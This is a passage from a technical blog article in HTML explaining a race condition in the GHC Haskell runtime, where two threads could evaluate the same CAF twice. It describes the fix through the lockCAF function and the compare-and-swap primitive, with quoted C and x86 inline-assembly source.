Here's the <em>old</em> description of how CAF evaluation works, <a href="http://hackage.haskell.org/trac/ghc/browser/rts/sm/Storage.c?rev=e91ed183fdde4aa4f51b96987c7fb6fa2bfd15f5#L227">from <code>Storage.c</code></a>:</p><blockquote><p>The entry code for every CAF does the following:</p><ul class="incremental"><li>builds a <code>BLACKHOLE</code> in the heap</li><li>pushes an update frame pointing to the <code>BLACKHOLE</code></li><li>calls <code>newCaf</code>, below</li><li>updates the CAF with a static indirection to the <code>BLACKHOLE</code></li></ul><p>Why do we build a <code>BLACKHOLE</code> in the heap rather than just updating the thunk directly? It's so that we only need one kind of update frame - otherwise we'd need a static version of the update frame too.</p></blockquote><p>So here's the problem. Normal thunks get blackholed <em>in place</em>, and a thread detects duplicated evaluation by noticing that one of its thunks-in-progress became a <code>BLACKHOLE</code>. But static thunks — CAFs — are blackholed <em>by indirection</em>. Two threads might perform the above procedure concurrently, producing two different heap-allocated <code>BLACKHOLE</code>s, and they'd never notice.</p><p>As Simon Marlow put it:</p><blockquote><p>Note [<em>atomic CAF entry</em>]</p><p>With <code>THREADED_RTS</code>, <code>newCaf()</code> is required to be atomic (see #5558). This is because if two threads happened to enter the same CAF simultaneously, they would create two distinct <code>CAF_BLACKHOLEs</code>, and so the normal <code>threadPaused()</code> machinery for detecting duplicate evaluation will not detect this. Hence in <code>lockCAF()</code> below, we atomically lock the CAF with <code>WHITEHOLE</code> before updating it with <code>IND_STATIC</code>, and return zero if another thread locked the CAF first. 
In the event that we lost the race, CAF entry code will re-enter the CAF and block on the other thread's <code>CAF_BLACKHOLE</code>.</p></blockquote><p>I can't explain precisely what a <code>WHITEHOLE</code> means, but they're used for <a href="http://en.wikipedia.org/wiki/Spinlock">spin locks</a> or wait-free synchronization in various places. For example, the <a href="http://hackage.haskell.org/trac/ghc/browser/rts/PrimOps.cmm?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L1105"><code>MVar</code> primitives</a> are synchronized by the <a href="http://hackage.haskell.org/trac/ghc/browser/includes/rts/storage/SMPClosureOps.h?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L26"><code>lockClosure</code></a> spinlock routine, which uses <code>WHITEHOLE</code>s.</p><h1 id="the-fix">The fix</h1><p>Here's the corrected <a href="http://hackage.haskell.org/trac/ghc/browser/rts/sm/Storage.c?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L227">CAF evaluation procedure</a>:</p><blockquote><p>The entry code for every CAF does the following:</p><ul class="incremental"><li>builds a <code>CAF_BLACKHOLE</code> in the heap</li><li>calls <code>newCaf</code>, which atomically updates the CAF with <code>IND_STATIC</code> pointing to the <code>CAF_BLACKHOLE</code></li><li>if <code>newCaf</code> returns zero, it re-enters the CAF (see Note [<em>atomic CAF entry</em>])</li><li>pushes an update frame pointing to the <code>CAF_BLACKHOLE</code></li></ul></blockquote><p><code>newCAF</code> is made atomic by introducing a new helper function, <a href="http://hackage.haskell.org/trac/ghc/browser/rts/sm/Storage.c?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L293"><code>lockCAF</code></a>, which is reproduced here for your viewing pleasure:</p><pre class="sourceCode"><code class="sourceCode c">STATIC_INLINE StgWord lockCAF (StgClosure *caf, StgClosure *bh)<br />{<br /> <span class="dt">const</span> StgInfoTable *orig_info;<br /><br /> orig_info = caf-&gt;header.info;<br /><br /><span class="ot">#ifdef 
THREADED_RTS</span><br /> <span class="dt">const</span> StgInfoTable *cur_info;<br /><br /> <span class="kw">if</span> (orig_info == &amp;stg_IND_STATIC_info ||<br /> orig_info == &amp;stg_WHITEHOLE_info) {<br /> <span class="co">// already claimed by another thread; re-enter the CAF</span><br /> <span class="kw">return</span> <span class="dv">0</span>;<br /> }<br /><br /> cur_info = (<span class="dt">const</span> StgInfoTable *)<br /> cas((StgVolatilePtr)&amp;caf-&gt;header.info,<br /> (StgWord)orig_info,<br /> (StgWord)&amp;stg_WHITEHOLE_info);<br /><br /> <span class="kw">if</span> (cur_info != orig_info) {<br /> <span class="co">// already claimed by another thread; re-enter the CAF</span><br /> <span class="kw">return</span> <span class="dv">0</span>;<br /> }<br /><br /> <span class="co">// successfully claimed by us; overwrite with IND_STATIC</span><br /><span class="ot">#endif</span><br /><br /> <span class="co">// For the benefit of revertCAFs(), save the original info pointer</span><br /> ((StgIndStatic *)caf)-&gt;saved_info = orig_info;<br /><br /> ((StgIndStatic*)caf)-&gt;indirectee = bh;<br /> write_barrier();<br /> SET_INFO(caf,&amp;stg_IND_STATIC_info);<br /><br /> <span class="kw">return</span> <span class="dv">1</span>;<br />}</code></pre><p>We grab the CAF's <a href="http://hackage.haskell.org/trac/ghc/wiki/Commentary/Rts/Storage/HeapObjects#HeapObjects">info table pointer</a>, which tells us what kind of object it is. If it's not already claimed by another thread, we write a <code>WHITEHOLE</code> — but only if the CAF hasn't changed in the meantime. This step is an atomic <a href="http://en.wikipedia.org/wiki/Compare-and-swap">compare-and-swap</a>, implemented by architecture-specific code. 
The function <code>cas</code> is <a href="http://hackage.haskell.org/trac/ghc/browser/includes/stg/SMP.h?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L43">specified by this pseudocode</a>:</p><pre class="sourceCode"><code class="sourceCode c">cas(p,o,n) {<br /> <span class="kw">atomically</span> {<br /> r = *p;<br /> <span class="kw">if</span> (r == o) { *p = n };<br /> <span class="kw">return</span> r;<br /> }<br />}</code></pre><p>Here's the <a href="http://hackage.haskell.org/trac/ghc/browser/includes/stg/SMP.h?rev=96c80d34163fd422cbc18f4532b7556212a554b8#L165">implementation for x86</a>, using <a href="http://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html">GCC extended inline assembly</a>:</p><pre class="sourceCode"><code class="sourceCode c">EXTERN_INLINE StgWord<br />cas(StgVolatilePtr p, StgWord o, StgWord n)<br />{<br /> __asm__ __volatile__ (<br /> <span class="st">&quot;lock</span><span class="ch">\n</span><span class="st">cmpxchg %3,%1&quot;</span><br /> :<span class="st">&quot;=a&quot;</span>(o), <span class="st">&quot;=m&quot;</span> (*(<span class="dt">volatile</span> <span class="dt">unsigned</span> <span class="dt">int</span> *)p)<br /> :<span class="st">&quot;0&quot;</span> (o), <span class="st">&quot;r&quot;</span> (n));<br /> <span class="kw">return</span> o;<br />}</code></pre><p>There are some interesting variations between architectures. SPARC and x86 use single instructions, while PowerPC and ARMv6 have longer sequences. Old ARM processors require a <a href="http://hackage.haskell.org/trac/ghc/browser/rts/OldARMAtomic.c?rev=96c80d34163fd422cbc18f4532b7556212a554b8">global spinlock</a>, which sounds painful. Who's running Haskell on ARMv5 chips?</p><h1 id="deep-breath">*deep breath*</h1><p>Thanks for reading / skimming this far! I learned a lot by writing this article, and I hope you enjoyed reading it. 
I'm sure I said something wrong somewhere, so please do not hesitate to correct me in the comments.</p><div class="footnotes"><hr /><ol><li id="x1fn1"><p>Tim Harris, Simon Marlow, and Simon Peyton Jones. <a href="http://www.haskell.org/~simonmar/papers/multiproc.pdf">Haskell on a shared-memory multiprocessor</a>. In Haskell '05: Proceedings of the 2005 ACM SIGPLAN workshop on Haskell, pages 49–61. <a href="#x1fnref1" class="footnoteBackLink">↩</a></p></li><li id="x1fn2"><p>Simon Marlow, Simon Peyton Jones, and Satnam Singh. <a href="http://community.haskell.org/~simonmar/papers/multicore-ghc.pdf">Runtime Support for Multicore Haskell</a>. In ICFP'09. <a href="#x1fnref2" class="footnoteBackLink">↩</a></p></li></ol></div>